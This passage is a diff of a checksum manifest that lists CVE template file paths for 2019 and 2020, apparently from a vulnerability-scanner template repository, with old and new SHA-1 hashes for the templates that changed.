+http/cves/2019/CVE-2019-11510.yaml:d6e6d6ad78a3445f60bb6e8dc75b37f289293c7c +http/cves/2019/CVE-2019-11580.yaml:a8e99a85051c0f58b7c7ddb91fd590639e1f0b62 +http/cves/2019/CVE-2019-11581.yaml:0962a26453640de4363d4e0ca655b9ee0d8598fc +http/cves/2019/CVE-2019-11869.yaml:223e8fbfc472a62769340c41f0017a013b42fc6d +http/cves/2019/CVE-2019-12276.yaml:fb5177e00a08d1ba5ec2ed962b12056e8d3a5fe9 +http/cves/2019/CVE-2019-12314.yaml:45e5093a3ac421643dcc25859931c3b6ba9057f6 +http/cves/2019/CVE-2019-12461.yaml:e59515dfc19f812aafa8c4b0bdad9c28b65ff574 +http/cves/2019/CVE-2019-12581.yaml:12e619fd37b7542432f3e428fb46b1a23b80f81f +http/cves/2019/CVE-2019-12583.yaml:839bb71239abe5bf41aad959223aad3708482b5b +http/cves/2019/CVE-2019-12593.yaml:dc9651e2d0787a3835e6295e77f9712c5db91236 +http/cves/2019/CVE-2019-12616.yaml:5695c1a6d55803b3e91baa1665080f813a00f390 +http/cves/2019/CVE-2019-12725.yaml:eb150ec0f37948a8e69b924d384e5f3f5d8a53a8 +http/cves/2019/CVE-2019-12962.yaml:5328204943985ad35ed0950cb5ccf286f1fa4c19 +http/cves/2019/CVE-2019-12985.yaml:48d3aa004dc4ae95cef74e06075943140c4a9ebc +http/cves/2019/CVE-2019-12986.yaml:00a8b35ba0b68e57a067fd139f7e7f52e8f843f9 +http/cves/2019/CVE-2019-12987.yaml:da3ea360d3019964911b678511236af53c41f6a7 +http/cves/2019/CVE-2019-12988.yaml:dd6ba95dbd27857f3fe47ca526dbff0f0e58e938 +http/cves/2019/CVE-2019-12990.yaml:d0773ec188e357d710146736e3af8a86e9319348 +http/cves/2019/CVE-2019-13101.yaml:ae9d95abb521c1b79cce351d330dc3b42e84070b +http/cves/2019/CVE-2019-13392.yaml:ce2b84675b816ead08f4912d7f894cf7cc7ac516 +http/cves/2019/CVE-2019-13396.yaml:cd8a877aba811f643970cfea627a30bc48b29bec +http/cves/2019/CVE-2019-13462.yaml:c06836b489a7942902428ef9c03baeb649cff019 +http/cves/2019/CVE-2019-14205.yaml:d57f3dd988d8000bb5d2a513d4f51cda75496cd2 +http/cves/2019/CVE-2019-14223.yaml:3be945555ecd14072d1bf7d87ef59f0e29c73ddd +http/cves/2019/CVE-2019-14251.yaml:2cd3f4fb3bb8ec7706366410a493577aa6ecddf0 +http/cves/2019/CVE-2019-14312.yaml:65fa579c20b881c49bd5fbadb68612d6aeea7765 +http/cves/2019/CVE-2019-14322.yaml:d243539818020519b68411124848fbd58922df93 http/cves/2019/CVE-2019-14470.yaml:feb43273bc10cccf96b8e1fdfa8c3973442039ad -http/cves/2019/CVE-2019-14530.yaml:a21235c8b43e59e40ad7d3c2372f53d54c794e99 -http/cves/2019/CVE-2019-14696.yaml:1d95b7c9e1cd841802f6ff592239bb2da0ebf1bf -http/cves/2019/CVE-2019-14750.yaml:6ca5ded0c6a2a0b01ec4fbd07a1c9d316532590d -http/cves/2019/CVE-2019-14789.yaml:9e084e98af571982c3541d7b6df97d5d4b5371cb -http/cves/2019/CVE-2019-14974.yaml:fab66c9fa2671fd957b866861070cf1f0c449e35 -http/cves/2019/CVE-2019-15043.yaml:2d8e17268051d372dd87356dd19d8ca95a03fd7a -http/cves/2019/CVE-2019-15107.yaml:a16ecd8b3d5b44ace9cc052b714f37939fb71209 -http/cves/2019/CVE-2019-15501.yaml:0ec7b6f2b9c32e42fafcea63e3fae54f222029e4 -http/cves/2019/CVE-2019-15642.yaml:19722b53950dd208a69868820a54683b5f9df13d -http/cves/2019/CVE-2019-15713.yaml:781dff249c59787481d73a69c64aacd876696fd6 +http/cves/2019/CVE-2019-14530.yaml:014ef9f12577fee10e36847921273da870dd6ef0 +http/cves/2019/CVE-2019-14696.yaml:8bb0920522198a471f418d5106d40090b74d447f +http/cves/2019/CVE-2019-14750.yaml:737327d2f4497b21934509672c8a1c94a275a460 +http/cves/2019/CVE-2019-14789.yaml:9abfb241c4372064325299d720740ad9ff35c0cb +http/cves/2019/CVE-2019-14974.yaml:5c660e5883ab8bc860a41cea3b9bcc1e77e15b63 +http/cves/2019/CVE-2019-15043.yaml:3567875d44a426e9b0524f0f3ff3fdcb519932d1 +http/cves/2019/CVE-2019-15107.yaml:cc948e3dce86ff30d549a30c11561d60446b9ee5 +http/cves/2019/CVE-2019-15501.yaml:ddc8d6187b18cc11941668ab296fc15a79c0dde6 +http/cves/2019/CVE-2019-15642.yaml:59ceb63e7c806e8540159a3f39c44aaa92a154af +http/cves/2019/CVE-2019-15713.yaml:10e07c10f196b1400a503b97ad125903ed1adbb8 http/cves/2019/CVE-2019-15811.yaml:f14050a032d55ce2ae1959a23cb97fe4cc75e464 -http/cves/2019/CVE-2019-15829.yaml:04ddd730b7a1a6d44a336c026f75498bae79bec9 -http/cves/2019/CVE-2019-15858.yaml:eb8403399fcdbd8ce9a21529f60bfbf5988e172d +http/cves/2019/CVE-2019-15829.yaml:d93dae607fbbfda1f268030ff115744eda65f509 +http/cves/2019/CVE-2019-15858.yaml:dd0e88830d6f0a234634472d109bda9140c02c6a http/cves/2019/CVE-2019-15859.yaml:45fdb86453346868de8338e41b0f108ee04042fc -http/cves/2019/CVE-2019-15889.yaml:e7a0826e403bb9e010db73d1b13501080fd0217c -http/cves/2019/CVE-2019-16057.yaml:78eb40dc6d8f29b5201301f3c2bc6f04eebfdd1a -http/cves/2019/CVE-2019-16097.yaml:1cdd486d70f786e7904e3a7d94a8dd7cbf1ef8df +http/cves/2019/CVE-2019-15889.yaml:3ef52eea70d7104a5109ff788384c3621e76a0a9 +http/cves/2019/CVE-2019-16057.yaml:a150d97bc24b0a958ee98070fde580a880be1c13 +http/cves/2019/CVE-2019-16097.yaml:be89395f00bc61330f2b6483c9295c1d39768fb5 http/cves/2019/CVE-2019-16123.yaml:9b28bd8cc89e8a3286374b34dd60bfcce4fe27d0 -http/cves/2019/CVE-2019-16278.yaml:2cbf9691cd4104d2b340cd4d5e6925a41df947e3 +http/cves/2019/CVE-2019-16278.yaml:d4149d9e0cf739bdaac6caec400e0b9fe8be159c http/cves/2019/CVE-2019-16313.yaml:2379d3c097b5e6a2915c5b8874f8700eff6656f2 http/cves/2019/CVE-2019-16332.yaml:6fc333ecc72bb9ae7f7cf1a81bf0e63501faee48 -http/cves/2019/CVE-2019-16469.yaml:6e85e9115e6650cd09da4d24f619843b9bc7ac11 +http/cves/2019/CVE-2019-16469.yaml:e350011c828be2e66f871dd7b339fe9bcd151ff3 http/cves/2019/CVE-2019-16525.yaml:51db7d84c840ddecfabe91c8b79dffc9e85b0700 http/cves/2019/CVE-2019-1653.yaml:8fbf1f7164f46c7bf4fbc5a14bdf3c6bc17fc9ce -http/cves/2019/CVE-2019-16662.yaml:74f125a17be26af500bd726d9b5ab3861d713e2a -http/cves/2019/CVE-2019-16759.yaml:cbf9b83765f0228de77c73210d6d419fd8fd442c +http/cves/2019/CVE-2019-16662.yaml:9229e08486910b48989f08049c83d04a45daf59b +http/cves/2019/CVE-2019-16759.yaml:b14316e4ddccd5f1593266fc28ac98d8d41f6312 http/cves/2019/CVE-2019-16920.yaml:865e89896464d2b4a5e61700021863096a8a2bd2 -http/cves/2019/CVE-2019-16931.yaml:d23e42b9b1dfd58ff1c5a89e26993c94e1cfd7b7 +http/cves/2019/CVE-2019-16931.yaml:c4ce5984023bdfde781c4fa8b19a8b782f2c9e09 http/cves/2019/CVE-2019-16932.yaml:752a6400d3e725e0709b45b312927f30d3d82162 http/cves/2019/CVE-2019-16996.yaml:6af14042b97fa925502d1c0b180890cb8f30b9ac -http/cves/2019/CVE-2019-16997.yaml:32f2b19fd4b728b9f693d17169d7f74b32689d68 +http/cves/2019/CVE-2019-16997.yaml:b7e350a4629c6352013831586ca26ecb0020851f http/cves/2019/CVE-2019-17270.yaml:d48604df6ef77def3e7fa1c9f6f916233f0cf6e3 -http/cves/2019/CVE-2019-17382.yaml:de2261176c45bd15fbfbdae01f6bf94e23cc57e3 +http/cves/2019/CVE-2019-17382.yaml:3c990cd6c5d0427e09eac074017e4a235b0fe06f http/cves/2019/CVE-2019-17418.yaml:09d65f801c6153058cda117d92049c4ae9580a07 -http/cves/2019/CVE-2019-17444.yaml:c6adc210bdcaf5fcbf8dc37346fabe38ebacd346 +http/cves/2019/CVE-2019-17444.yaml:fe7925cc25fd290827df56c3772006ff4f4daa72 http/cves/2019/CVE-2019-17503.yaml:6701aacab1ee79d24acd3cbd1497fb50399ad671 http/cves/2019/CVE-2019-17506.yaml:b0db1a0dd94538fede1011a56f7f41708dc89d6d -http/cves/2019/CVE-2019-17538.yaml:7a34111b1b615caf71f0d479eb8b6cc5e465ac29 -http/cves/2019/CVE-2019-17558.yaml:8f153604065b9c7744bd2246865b2e87c00e053b -http/cves/2019/CVE-2019-17574.yaml:892d01b36db1255d8007f717c1fb6c4d4f802588 -http/cves/2019/CVE-2019-17662.yaml:e6e3f40e798aad8fd78fb6f897f0a7ecae4a817d -http/cves/2019/CVE-2019-1821.yaml:d19e01b6b92ea25c70d576bb415da93aee8d4f0f -http/cves/2019/CVE-2019-18371.yaml:cb87df6d841c8de310c9421503698b22fe4689a7 -http/cves/2019/CVE-2019-18393.yaml:2fa5d07a297e08f62fe65b85a66468d1e91456e2 -http/cves/2019/CVE-2019-18394.yaml:f58089be77e0e2f5e5a34839f3c60d4715924666 +http/cves/2019/CVE-2019-17538.yaml:e427655cb8a73e608adee628c3ca459b713921ee +http/cves/2019/CVE-2019-17558.yaml:9750af36fb5994404b46600389c124d00ebb9113 +http/cves/2019/CVE-2019-17574.yaml:4ba50fc7133a0618d27bceb9b14c83dcb34a38c4 +http/cves/2019/CVE-2019-17662.yaml:8e6fedc5549df29f3f224e263ef72013c5672dbd +http/cves/2019/CVE-2019-1821.yaml:4325f02bbf036da272e74d6c0bd97165d27bfe47 +http/cves/2019/CVE-2019-18371.yaml:fec092d5d3baa9fdd72fa9d57474ff90a3bbfa37 +http/cves/2019/CVE-2019-18393.yaml:0a5fa73baf012eea8c099130c6e6bc6e8a9f4aec +http/cves/2019/CVE-2019-18394.yaml:ee24803bb21344bb3567f8acc905623730d90184 http/cves/2019/CVE-2019-18665.yaml:ddd5fc6661c5a4d13da8ecba440daf78f4dec7f0 http/cves/2019/CVE-2019-18818.yaml:c8f04d93a506f8d1d801ba19e51d1dc4f5005d43 http/cves/2019/CVE-2019-18922.yaml:95118c0faac56d9ab7f7c0731d9ffd8d37413f74 http/cves/2019/CVE-2019-18957.yaml:0fa1c55cdae830f3c0a64b01886c2ec2c4f769b9 -http/cves/2019/CVE-2019-1898.yaml:f0f71275ec7d10e813cd556632ba7342580eced0 +http/cves/2019/CVE-2019-1898.yaml:d6da27d5250a3f1699b7332444d4276e0f6eb3dd http/cves/2019/CVE-2019-19134.yaml:3db2b49e04e2ee29182af1285b416361be36a428 -http/cves/2019/CVE-2019-19368.yaml:dd2b3f21190be0cf7506aa1910fce2e2ac085baf +http/cves/2019/CVE-2019-19368.yaml:c6ca0ce8b465ba621c9953b40ce5cf83f5e4d90a http/cves/2019/CVE-2019-1943.yaml:866d0aa9df67c656e9ff6b133d795e5da483b26b http/cves/2019/CVE-2019-19781.yaml:8818dd71d9de019748689ab135368ea27178f8ae http/cves/2019/CVE-2019-19824.yaml:32d5ce9eb42b06926942b7aa6aa1dad1436e97ac http/cves/2019/CVE-2019-19908.yaml:9f9fc75caaf52382b3e1342991443b636e222ae0 http/cves/2019/CVE-2019-19985.yaml:8f1e3cb36997db32ba57b1270de3f5692db1264a -http/cves/2019/CVE-2019-20085.yaml:b12a595f2f94c500147d19dc78114c8fb8b4d23f -http/cves/2019/CVE-2019-20141.yaml:ff23736b1373f16c104fcb0994fd115aa0dbd943 +http/cves/2019/CVE-2019-20085.yaml:7a89305d4926c92ba6536f6fff5a2f6eb2eecf77 +http/cves/2019/CVE-2019-20141.yaml:a35d73a26d4304223e7f62e87791e663a12e069a http/cves/2019/CVE-2019-20183.yaml:09eb91b7f52447d8655a37ed4bbe95300e7378bf -http/cves/2019/CVE-2019-20210.yaml:33c5ab4fb84e026a52a44b982f8a3c68753ac9d4 -http/cves/2019/CVE-2019-20224.yaml:63c371fdb3627b07c5ca57bc82234ce2fd73dbf1 -http/cves/2019/CVE-2019-20933.yaml:b4ff75ea2a14351ba4455cc2049a5367d33bb5f6 +http/cves/2019/CVE-2019-20210.yaml:423485155c1d5ad2f94ce866e2a2d9738d7eb701 +http/cves/2019/CVE-2019-20224.yaml:d4627b2f43c8bd7e4417435f435f678196e8ea83 +http/cves/2019/CVE-2019-20933.yaml:2dcc2b52e8b1e6037cab9f8c91a66d03ddf27cb6 http/cves/2019/CVE-2019-2578.yaml:a0704f60e75947e62e565cb45595a84b731dd81b http/cves/2019/CVE-2019-2579.yaml:f7deec158d506da6c216c93f0375f5a927317da4 http/cves/2019/CVE-2019-2588.yaml:c7f798622689a44bf38e9c96710add9c5bdcc5cd -http/cves/2019/CVE-2019-2616.yaml:3fe8eb3189261123c345704ad4e82e0cd5a6ecb4 +http/cves/2019/CVE-2019-2616.yaml:49771e4c9de01bd8e36ce88a50a5d707dda27c66 http/cves/2019/CVE-2019-2725.yaml:c0b1c9de5b114881547faa1ecb3a9dfe55f3af0c -http/cves/2019/CVE-2019-2729.yaml:34fe986223062b08b38a8a1da72390f96d7e35d8 +http/cves/2019/CVE-2019-2729.yaml:222af28a1803c75b198281d8150ae8e6eeb863e9 http/cves/2019/CVE-2019-2767.yaml:9c9628b7dead68845570d0883068ad29cec11c69 http/cves/2019/CVE-2019-3396.yaml:24a87a48a55562a9f9284f20e9b59b12a0e52727 -http/cves/2019/CVE-2019-3398.yaml:359883860ff50c8282893320e98877cf4f201bf8 +http/cves/2019/CVE-2019-3398.yaml:0f781eea698b5305dc59e8e6c441a04510225a91 http/cves/2019/CVE-2019-3401.yaml:e919f1305ffa5044b5eac5e37d80178d8413aadf http/cves/2019/CVE-2019-3402.yaml:e875780f5316e2e685f55c79921cdcb90390396b -http/cves/2019/CVE-2019-3403.yaml:cb860e2d12ba9f84068252624d4fa9c20a25ea55 -http/cves/2019/CVE-2019-3799.yaml:7ca01e8bc838b8f14b8ff2c3a7856d8ab4aa6db7 -http/cves/2019/CVE-2019-3911.yaml:60bad0968b361ad7400cbf147b011d9bd62f48a9 -http/cves/2019/CVE-2019-3912.yaml:fd327d636ba1fe5c3fdd1d923b23f4a3aa4b7842 -http/cves/2019/CVE-2019-3929.yaml:2a461f92bd310f46ab1c2cc3d4da0f237134675c -http/cves/2019/CVE-2019-5127.yaml:a8573a60af8fc2961f11b134e4b18dfb1e5643b6 -http/cves/2019/CVE-2019-5418.yaml:45c69bfdef5871a86b8ae2af518cbfaba298464c -http/cves/2019/CVE-2019-5434.yaml:ed7547e7f4361fb86514077654e2f3a0b8f1e9f4 -http/cves/2019/CVE-2019-6112.yaml:f7ddfaa256066a26aaedb8da74037292814708a5 -http/cves/2019/CVE-2019-6340.yaml:c5c4688ced3332dbb8ed7d9ce2ce28c67527c15d -http/cves/2019/CVE-2019-6715.yaml:cf0c3c5bb1820844c1046ee082bcf9f94675da40 -http/cves/2019/CVE-2019-6799.yaml:f6c533ec6b153c1c5da9f42082b8497c8d9138dd -http/cves/2019/CVE-2019-6802.yaml:df7d1b0093b3e31a4b7a40b4bfcbc06ddac09672 +http/cves/2019/CVE-2019-3403.yaml:2e3792d689965282d2c111d88a73504d7dce6e2d +http/cves/2019/CVE-2019-3799.yaml:b50992af94bf8f2b667b253029d6e978c184686a +http/cves/2019/CVE-2019-3911.yaml:817157aaf7e4b3ecc9c7ad6203707d49e0d05544 +http/cves/2019/CVE-2019-3912.yaml:05816b1655912464da0072b87cdfe90eee7b0719 +http/cves/2019/CVE-2019-3929.yaml:9de8f3f7312bd0b5525ba41b71ddffeb6dc193bf +http/cves/2019/CVE-2019-5127.yaml:a18cf67b04c44e210d6fc33343dd77820fc1555b +http/cves/2019/CVE-2019-5418.yaml:69a34f868bdea612ab7691eab3543566947699b9 +http/cves/2019/CVE-2019-5434.yaml:4c1da5f6a66c7c48bab3d57a5b7f0edc6a7ed024 +http/cves/2019/CVE-2019-6112.yaml:d009c3b8cc6cdb705307890c9ec89513170694d8 +http/cves/2019/CVE-2019-6340.yaml:86e83cd0f886a50667fb3cfc64d5537c48140ce9 +http/cves/2019/CVE-2019-6715.yaml:1462b82ac15f5475e25a1c70be0638512af43b0e +http/cves/2019/CVE-2019-6799.yaml:f6e232fc8162233e387fd6b8feb6343a3d4a4bc1 +http/cves/2019/CVE-2019-6802.yaml:8e97b2928034c605cf63ea06495bd7323b1b4b4b http/cves/2019/CVE-2019-7139.yaml:9ce4e6a9da54dabf3d98d063111cc7e8d337fef7 -http/cves/2019/CVE-2019-7192.yaml:a3c022f3f5f609a34f4fff7c8584b27bbe280088 -http/cves/2019/CVE-2019-7219.yaml:22b58ee1a923ac844ea0def093b470e6271be400 -http/cves/2019/CVE-2019-7238.yaml:95354fb6a82023096eb5605d4c31f822955e5898 -http/cves/2019/CVE-2019-7254.yaml:58d2705cf5a3522943dc404d0605c0344f6e0ceb -http/cves/2019/CVE-2019-7255.yaml:15cd8a68db1d99991d667d66a6bc422d3e6aeca0 -http/cves/2019/CVE-2019-7256.yaml:3ac6d980c716565de1ef79f4d9bb3b4a9e387740 +http/cves/2019/CVE-2019-7192.yaml:4b711f4f722e162132785380aa6ec24148834ec6 +http/cves/2019/CVE-2019-7219.yaml:066161828bddf3fad9c338d9ab9f902431f9ad00 +http/cves/2019/CVE-2019-7238.yaml:6fb130fbe23c11eba5b3ce1985fde0165f3914ca +http/cves/2019/CVE-2019-7254.yaml:ad24fea4ae2fba5b3c90618326513bdb5dfbedde +http/cves/2019/CVE-2019-7255.yaml:7d5d2e3b98102930733a586a1d1ec088282a2f6f +http/cves/2019/CVE-2019-7256.yaml:9b36f3e017eda1de90ee67a0baee734e31ca1fdb http/cves/2019/CVE-2019-7275.yaml:d251cbfb5bcd0cef05eae4ca47c159d2b03ce132 -http/cves/2019/CVE-2019-7315.yaml:563d393bc73e5b333d833a2246ea88618f7dc974 +http/cves/2019/CVE-2019-7315.yaml:aef603a42e387838d30064359e8f376292d8c488 http/cves/2019/CVE-2019-7481.yaml:7e3ebd3190512ff8d2949cb3522a11884b3e75c4 http/cves/2019/CVE-2019-7543.yaml:03e4e0a5e50bfb20f17e3b446c41035f56d6351a -http/cves/2019/CVE-2019-7609.yaml:6e6f132b4bfff1ae086c14c0e841c0f0d85b119e -http/cves/2019/CVE-2019-8086.yaml:52e596338a09e62826e3ee5b50068eb2775a858b -http/cves/2019/CVE-2019-8390.yaml:d3553e9ed80efd29280fae1a715cbcffc9530e09 -http/cves/2019/CVE-2019-8442.yaml:04a79ea9dfd14ec3a51f817ba469eefec9d6e506 -http/cves/2019/CVE-2019-8446.yaml:8c8d7da037e6deaaaba5ed387258e7bfa4fd6bbc -http/cves/2019/CVE-2019-8449.yaml:28d6468489990a531504fe946cd565726f84b734 +http/cves/2019/CVE-2019-7609.yaml:429a7deb4d729e22c14cd66db90f7cbad01564f0 +http/cves/2019/CVE-2019-8086.yaml:6e201e44c80550e4981fc22cfaee801272cfe385 +http/cves/2019/CVE-2019-8390.yaml:b18016f9d895afdb0c2dc81ff8ac484b845f0caf +http/cves/2019/CVE-2019-8442.yaml:b145c1968834d349dd2e15e465f121fc34f686ea +http/cves/2019/CVE-2019-8446.yaml:1762b98d29b72640f5ceac6c8b71d157d54904b3 +http/cves/2019/CVE-2019-8449.yaml:62a9df63a8563c26c81bc4978531c3cc168cb9fd http/cves/2019/CVE-2019-8451.yaml:814f3f055c890bf9f2018767b4db70a623fb351c http/cves/2019/CVE-2019-8903.yaml:187c434537693e85a8ff134a9c6ce0fd2912ebae -http/cves/2019/CVE-2019-8937.yaml:9b9106c252c15d8df2fa8ebd0ae0f1ab36cb4bfb -http/cves/2019/CVE-2019-8982.yaml:e0d303e9104eb25c01b2f53d8bdef398a464cc40 +http/cves/2019/CVE-2019-8937.yaml:66e792ae741558c01f8137916f06d27e7262cfe9 +http/cves/2019/CVE-2019-8982.yaml:d345b49353e77db87682e091eba0c1668e5a374f http/cves/2019/CVE-2019-9041.yaml:1acd718661ba2a770f36087b628c659c058bf16c -http/cves/2019/CVE-2019-9618.yaml:bd20454a1919dd4b65ae2ff8c539ef0781605acf -http/cves/2019/CVE-2019-9632.yaml:a9b4273d963d3b99382bc05bb819a3f47bfa2b81 -http/cves/2019/CVE-2019-9670.yaml:8750d6eed79a4854dddbf7228f6e33488588d8d6 -http/cves/2019/CVE-2019-9726.yaml:22711bb0aaac4abb940352d002f34f101c1c831c -http/cves/2019/CVE-2019-9733.yaml:f98e32bd5d2c400b944115b429bb58a84f0cded3 -http/cves/2019/CVE-2019-9915.yaml:eb20be2c46939b6b57b4463f42bab1429f6a16b8 -http/cves/2019/CVE-2019-9922.yaml:f208a9a411ee06862f265c7a021195694b9806a6 +http/cves/2019/CVE-2019-9618.yaml:d1d4515fdd132e8704aa3ad89f97f9a3840d2503 +http/cves/2019/CVE-2019-9632.yaml:0274c217e1647f506915d7c84cdb5f792287060b +http/cves/2019/CVE-2019-9670.yaml:4c5ad92a6cda1072215f60d63717521d9b552b44 +http/cves/2019/CVE-2019-9726.yaml:dc39e85dbbe5056aae9925c7a68be4767ff3992c +http/cves/2019/CVE-2019-9733.yaml:2caf78cb597139c1a3db12a011f7f9ba6e94ac68 +http/cves/2019/CVE-2019-9915.yaml:939eceb6822e8651b5daaf3085bdcc1d35e434d6 +http/cves/2019/CVE-2019-9922.yaml:6c85785266eba7189ac1457d23b0473f33cf9440 http/cves/2019/CVE-2019-9955.yaml:aa1f5d5783764fa700842f5a8d7bec989d60f572 http/cves/2019/CVE-2019-9978.yaml:888dc6e81557675a2255e20d09d22c709863eede -http/cves/2020/CVE-2020-0618.yaml:800965770c9aea20da669fe5083b4c0b2cb34461 +http/cves/2020/CVE-2020-0618.yaml:ba66da0763579b0aea33e37bd6b9124cc35a7419 http/cves/2020/CVE-2020-10148.yaml:bbb610b4e3403659c5f171819c0cace86262e009 -http/cves/2020/CVE-2020-10199.yaml:77d72c4b9762cd1ca9e0e2b0dbafd457d6e89583 -http/cves/2020/CVE-2020-10220.yaml:4778e319ea29668de75ddd08d835c101dca6ce91 -http/cves/2020/CVE-2020-10546.yaml:f4cfaba39bd36ea06f7ad20f779c8b892b327f95 -http/cves/2020/CVE-2020-10547.yaml:fccf2c60ed0d31406920c7f1c696c8e7e4f8a9f2 -http/cves/2020/CVE-2020-10548.yaml:c729f31eda87929ce0ef96b5c4bd29d439828b95 -http/cves/2020/CVE-2020-10549.yaml:8d62ce9548305a000a29ee4de7cab6deb2b057f3 -http/cves/2020/CVE-2020-10770.yaml:e91c721865dd2ff31cecf4aa60d6b51bd9561a4b -http/cves/2020/CVE-2020-10973.yaml:201cab00b4e2ace6f44b87582e5837359bb6731b -http/cves/2020/CVE-2020-11034.yaml:e3c027ab23fdced89e9e73cf36bcf8d1cc3390a0 -http/cves/2020/CVE-2020-11110.yaml:44cb6133ad238cbe045ef5abc513fb02b16fb78f -http/cves/2020/CVE-2020-11450.yaml:8756a2949a6c8fb8745f7349dc63d5eae6e07774 +http/cves/2020/CVE-2020-10199.yaml:b93ee10549d24ac7a2207b525846b37e90c70ee4 +http/cves/2020/CVE-2020-10220.yaml:13edb444acc4430103a4f7f6a84f10602f89fe79 +http/cves/2020/CVE-2020-10546.yaml:4cbf1b7e152d7cffe84df5feef391dfcd46438dc +http/cves/2020/CVE-2020-10547.yaml:153c1b664b9491f7fcbc530feba3ba406b13deb0 +http/cves/2020/CVE-2020-10548.yaml:f37fec2174247354f9753fa6a2925047d2f69cc1 +http/cves/2020/CVE-2020-10549.yaml:7ff911d067ec6f0bde4ba6edfb5b609001870243 +http/cves/2020/CVE-2020-10770.yaml:ff35530145e876517077a4de00cb01f674d6c6b9 +http/cves/2020/CVE-2020-10973.yaml:72c3a72495f9675d3b99f4e5e6ca8f29d30fd265 +http/cves/2020/CVE-2020-11034.yaml:a825664c651e60f532af8d3c14610eea3f429d62 +http/cves/2020/CVE-2020-11110.yaml:fadc703ac41b35d8a1e87e554e36848674bdd6af +http/cves/2020/CVE-2020-11450.yaml:09220519d0db5db7c2a93fc06f80c6dae4f839ea http/cves/2020/CVE-2020-11455.yaml:db648543edc249d1dda1a67313f2a1ba678f8ada http/cves/2020/CVE-2020-11529.yaml:3a4f8deb2ba9eb5e87c9a4c87aa59bd5bc8b39c3 -http/cves/2020/CVE-2020-11530.yaml:c8b08da8627b2000000190853448b23f342fbc57 -http/cves/2020/CVE-2020-11546.yaml:d36c933c917a36874cbe0bea23837423a0d0f984 -http/cves/2020/CVE-2020-11547.yaml:0438a800f5346bc94895d8d3ca876529e7e5b752 -http/cves/2020/CVE-2020-11710.yaml:a8eebe94fca4681df48465ce78931cfb6a15da9e -http/cves/2020/CVE-2020-11738.yaml:38359263c5d1dd96d14cb4e5c55af4abfc62fa51 -http/cves/2020/CVE-2020-11798.yaml:4fac247c7e85074886b2222c70d627c7956f52fb -http/cves/2020/CVE-2020-11853.yaml:e9d6c43bb2ec253628b47ead334f90ec94c898aa -http/cves/2020/CVE-2020-11854.yaml:3aefc5b8da8bc0ab3112afec13a9d1461a928de1 -http/cves/2020/CVE-2020-11930.yaml:14ed550a2b4ebc2783eb0b9095e0ca792528315c -http/cves/2020/CVE-2020-11978.yaml:511466908b771f79db4fff1bbba8ca24f6c3d704 -http/cves/2020/CVE-2020-11991.yaml:222fe8cf6c5c7a92134acf23ce2562ff01105ad2 -http/cves/2020/CVE-2020-12054.yaml:f12b823b465f98af2f1aec6deed88b59fc412bfd -http/cves/2020/CVE-2020-12116.yaml:21d8e5468b29dfb8d2cfdb1c172f5f34c2232d2c -http/cves/2020/CVE-2020-12124.yaml:70eed1ed97b7fdc2924b9fdefc780f1b363fff97 -http/cves/2020/CVE-2020-12127.yaml:c6001a6c3877da5a3ae09e444a0b127e366637ba -http/cves/2020/CVE-2020-12256.yaml:f34659b59eaa2e1c504e59820b83c7563c536061 -http/cves/2020/CVE-2020-12259.yaml:73dda606f0fdc6c667fe8b2c22c27752240b2392 +http/cves/2020/CVE-2020-11530.yaml:80c9a47fde950d0a147cd5759e76fb36f9ddf865 +http/cves/2020/CVE-2020-11546.yaml:b2084708702133ce517eb71887809b459689f93a +http/cves/2020/CVE-2020-11547.yaml:b146bb73841f6b4ee326a5509431fbb9548396db +http/cves/2020/CVE-2020-11710.yaml:328459cf74b245b08f305b4da5b937778d78e9bd +http/cves/2020/CVE-2020-11738.yaml:26bc4a13b4dc75ef0ff4c86b0551736ad7ab0953 +http/cves/2020/CVE-2020-11798.yaml:754b954dee6c994a9f0aa84d27acb9cec98af47d +http/cves/2020/CVE-2020-11853.yaml:d688b8bf64d257892f84464396a6a1b56df47ddd +http/cves/2020/CVE-2020-11854.yaml:5b340b27bcee9e4e2a7bee5aa5e6849caabfbcdd +http/cves/2020/CVE-2020-11930.yaml:860f6680f4695f1feb7ab31de46449255ceece0a +http/cves/2020/CVE-2020-11978.yaml:6e72db28c07f184db4aee35e022988d897584841 +http/cves/2020/CVE-2020-11991.yaml:de4b0a2b5977855bfe63b173a4a4edb7e2e7316e +http/cves/2020/CVE-2020-12054.yaml:ccce337032ce9b12fe10efc5dcc4ca9b081e6ae9 +http/cves/2020/CVE-2020-12116.yaml:996d7d30601cb3ab87713f51cb15b93d59f28a74 +http/cves/2020/CVE-2020-12124.yaml:c60dc6e91d9b585c32fa85b3fa435122369080e9 +http/cves/2020/CVE-2020-12127.yaml:b60eab474bcfed827e783af39373f85fe9bb441f +http/cves/2020/CVE-2020-12256.yaml:939117d118c605aef9190c382e1aed61ece2af4e +http/cves/2020/CVE-2020-12259.yaml:fb372d0d4ec478378350cf8e844bbeac9e75b0cf http/cves/2020/CVE-2020-12447.yaml:25dca8fa73cb9a731e02a12b840d047144d60d13 -http/cves/2020/CVE-2020-12478.yaml:87e72cdc38005613a2284767f0a0225dc4cca51a -http/cves/2020/CVE-2020-12720.yaml:7b1db34fec447254d14245023e8a6c62d603d5e1 +http/cves/2020/CVE-2020-12478.yaml:6f8ebabd8a4a0df0eaaf7ebb99dbb706121d2418 +http/cves/2020/CVE-2020-12720.yaml:c7b69aea19ee132d50d7d92cd71b9bb38d56a390 http/cves/2020/CVE-2020-12800.yaml:571e8c8b17acd08b60d0b8f28a12c6589caa253c -http/cves/2020/CVE-2020-13117.yaml:20ee55cb74559402ad4b5e5570ba452ea96d7dec -http/cves/2020/CVE-2020-13121.yaml:4e31f4f3965162eec18f0f5458571a6ef4e17c70 -http/cves/2020/CVE-2020-13158.yaml:8eaf68c6e18b2f37e3020a1373b4da7a0e43b36b -http/cves/2020/CVE-2020-13167.yaml:0bcb46d26cc1d9722db0635eee7b834b101f4f60 -http/cves/2020/CVE-2020-13258.yaml:e65163f41e4d4f35947ca9a75d56fc81fc33c672 -http/cves/2020/CVE-2020-13379.yaml:de18bb72cb84abdaf69c7ae1920c351d916f8978 -http/cves/2020/CVE-2020-13405.yaml:2fbea436dc186fe32b0d2238dd9727fe8114df9d -http/cves/2020/CVE-2020-13483.yaml:d032793a83c1391bdd6c380c0b9884e0546ddc58 -http/cves/2020/CVE-2020-13638.yaml:be73c7ba116e9ffec0963f335231be77e1c17bd0 +http/cves/2020/CVE-2020-13117.yaml:115011fc3689582aab5176d3b93c0353c5f68a58 +http/cves/2020/CVE-2020-13121.yaml:93e5a3ab99c0ba9e334c2e082b4d38fb250b69ac 